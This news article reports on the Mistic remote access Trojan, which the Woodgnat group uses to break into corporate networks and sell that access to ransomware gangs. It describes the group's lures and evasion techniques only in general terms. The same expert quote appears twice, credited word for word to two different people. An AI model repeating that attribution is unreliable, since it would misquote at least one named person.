Woodgnat Hackers Use Mistic RAT to Broker Access for Ransomware Gangs

Summary

A new remote access Trojan (RAT) called Backdoor.Mistic is being used by the Woodgnat hacking group to compromise corporate networks. These actors act as initial access brokers, selling entry points to ransomware gangs like Qilin and Black Basta. The group employs social engineering tactics, including fake technical alerts via hijacked websites and deceptive Microsoft Teams messages, to trick employees into running malicious commands.

Full text

Security Cyber Crime MalwareWoodgnat Hackers Use Mistic RAT to Broker Access for Ransomware Gangs Woodgnat Hackers use Backdoor.Mistic, a stealthy RAT, to let brokers compromise networks and sell entry points to ransomware groups, putting firms at risk. byDeeba AhmedJune 26, 20263 minute read Listen to this article 0:00 — ← 10s ▶ Play 10s → Speed 0.75× 1× 1.25× 1.5× 2× Voice Loading voices… Press play to start listening A newly discovered remote access Trojan (RAT) called Backdoor.Mistic (Mistic backdoor), tracked by Zscaler as MLTBackdoor, is helping hackers infiltrate corporate networks. Detected in April 2026, this RAT is used by a specific group to set up hidden entry points inside businesses. Instead of disrupting systems themselves, these actors operate as brokers, selling network access to major ransomware operations. Security firms like Broadcom’s Symantec team, Carbon Black, Zscaler, and ThaiCert have been tracking this activity. They linked the campaign to a group active since May 2024 known as Woodgnat hackers (aka KongTuke). Woodgnat hackers, who also deploy a tool called ModeloRAT, act as a middleman for ransomware networks like Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta. The group hits schools, insurance firms, and IT services at random just to find any opportunity to profit. Sneaky tricks on web browsers and Teams To compromise a system, the hackers rely heavily on tricking regular employees. They hijack normal WordPress websites to push fake technical alerts. In a recent tactic from early 2026 called CrashFix, they purposely froze a victim’s web browser and displayed a message telling them to copy-paste a command to fix the issue. Similar browser tricks were used by these actors in 2025 under the names ClickFix and FileFix. From April 2026, they have also started messaging staff directly on Microsoft Teams, posing as the company’s IT helpdesk to lure workers into running malicious commands. A backdoor that leaves no trace Once an employee falls for the trick, a multi-stage PowerShell chain downloads the malware. The hackers install Backdoor.Mistic, which lets them manage files and even display fake login screens to steal passwords. Afterward, they use built-in Windows tools like Net.exe and Reg.exe to map out the network, and Curl to transfer data out. What makes this RAT more dangerous is its excellent hiding mechanism relying on a technique called DLL sideloading. This involves abusing trusted Windows files to trick security software into running the backdoor. Apart from this, it runs entirely in the computer’s temporary memory without saving files to the hard drive, which makes it hard for antivirus programs to spot it. If the scammers think they may get caught, they use a built-in kill switch to make the malware delete itself instantly. With such quiet tools to compromise networks readily available to cybercriminals, companies need to closely monitor for unexpected IT support messages or strange computer commands before hackers can sell off their network access. Experts’ Comments Experts say this threat highlights how organised the online underworld has become. In comments shared with Hackread.com, Roman Sannikov, Global Research Coordinator at iCOUNTER, noted that the emergence of Mistic shows the continued industrialization of the cybercrime ecosystem. He explained that initial access brokers have become critical suppliers, specializing in finding, validating, and monetizing access. “The C2 patterns, hosting choices, and staging behavior that Woodgnat hackers use to maintain and sell access tend to be more consistent across engagements than the downstream operators who purchase it. Defenders focused only on the ransomware payload are looking at the wrong layer. The access infrastructure is upstream of the incident, and visibility into how brokers like this operate, their routing, their reuse patterns, their handoff mechanisms, is what allows defenders to detect and disrupt before the ransomware operator ever enters the environment,” Sannikov stated. Josh Picolet, VP of Detection & Analysis at Team Cymru, also shared his perspective with Hackread.com, explaining that defenders who only focus on the final ransomware payload are looking at the wrong layer. According to Picolet, the infrastructure connecting these groups is the most durable intelligence target. He stated, “The access infrastructure is upstream of the incident, and visibility into how brokers like this operate, their routing, their reuse patterns, their handoff mechanisms, is what allows defenders to detect and disrupt before the ransomware operator ever enters the environment.” Deeba Ahmed Deeba is a veteran cybersecurity reporter at Hackread.com with over a decade of experience covering cybercrime, vulnerabilities, and security events. Her expertise and in-depth analysis make her a key contributor to the platform’s trusted coverage. View Posts backdoorCyber CrimeCybersecurityMalwareMisticRansomwareRATWoodgnat Leave a Reply Cancel reply View Comments (0) Related Posts Read More Cyber Attacks Security Everest Ransomware Claims McDonalds India Breach Involving Customer Data The notorious Everest ransomware group is claiming to have breached McDonald’s India, the Indian subsidiary of the American… byWaqas Read More Data Breaches Cyber Attacks Security ShinyHunters Claims 1 Petabyte Data Theft from Telecom Giant Telus ShinyHunters claims it stole up to 1 petabyte of data from Telus Digital, including support recordings, code, and employee records after a breach. byDeeba Ahmed Read More Security Technology 5 IoT Vulnerabilities That Stop Projects and How to Avoid Them Stop the 75% failure rate. Learn which device vulnerabilities stall deployments and the exact fixes that get IoT projects to production. byOwais Sultan Hacking News Privacy Security FBI Finally Hacks San Bernardino Gunman’s iPhone Proving Snowden Was Right The FBI has hacked into the iPhone of Syed Rizwan Farook and it didn’t even require for Apple’s help… byWaqas

Indicators of Compromise

• malware — Backdoor.Mistic
• malware — MLTBackdoor
• malware — ModeloRAT

Entities